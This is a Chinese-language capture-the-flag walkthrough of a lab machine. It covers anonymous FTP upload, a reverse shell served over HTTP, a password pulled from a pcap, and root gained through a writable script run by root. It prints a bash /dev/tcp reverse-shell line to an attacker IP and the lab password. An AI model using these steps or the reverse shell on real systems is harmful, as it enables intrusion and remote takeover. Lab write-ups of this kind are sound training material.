信息收集
通过开放端口可以发现21端口和80端口可以进行下手,首先对21端口进行匿名用户访问测试登录成功
将important.jpg和notice.txt文件下载,ftp目录并没有文件,但是通过权限的观察可以进行写入(也就是上传文件),后续可能用到
通过查看notice.txt得到一些管理员的信息,大概意思是不知道谁上传了一个文件,很可笑,透漏了一个用户名为Maya
通过分析important.jpg并没有得到有用的信息
接着访问80端口看一看有没有什么新的消息
主页是招聘网络安全人员的信息,没有太大的用处,直接进行目录扫描
gobuster dir -u http://10.10.218.215/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php,zip,rar,js -t 66
初始访问权限
通过扫描得到一个files目录,访问查看
发现和ftp匿名登录的目录一样,这里我们可以使用ftp上传反弹shell文件
上传成功
使用浏览器访问获得shell
在根目录发现recipe.txt,得到辣汤的秘方为love(爱)
权限提升
有一个奇怪的目录incidents,进入查看有一个suspicious.pcapng数据包文件,将suspicious.pcapng复制到/var/www/html/files/ftp目录,然后下载
一般情况下需要使用wireshark分析,但是我并不太熟练使用,不过我通过strings工具的分析,得到了用户的密码c4ntg3t3n0ughsp1c3
应该是lennie用户的密码,使用ssh远程连接得到user.txt
获取root权限
发现scripts目录,进入查看发现planner.sh和startup_list.txt文件
有意思是的,通过上图发现startup_list.txt文件的最后更改时间是刚刚
接着查看planner.sh文件发现执行了/etc/print.sh文件
分析这两个文件的权限
发现planner.sh文件的所有者是root,我们拥有/etc/print.sh文件的修改权限
这里就有了一个思路,我们可以借用planner.sh文件的root权限调用/etc/print.sh文件执行我们想要的反弹shell代码,然后获得root权限,这里只是猜测,因为startup_list.txt文件是由planner.sh文件生成,并且最后一次修改时间是当前最近的时间,猜测可能有后台进程。
这里只需要在/etc/print.sh加入/bin/bash -i >& /dev/tcp/10.14.74.4/8888 0>&1即可,实际操作如下:
加入后,等待一分钟,获得root权限
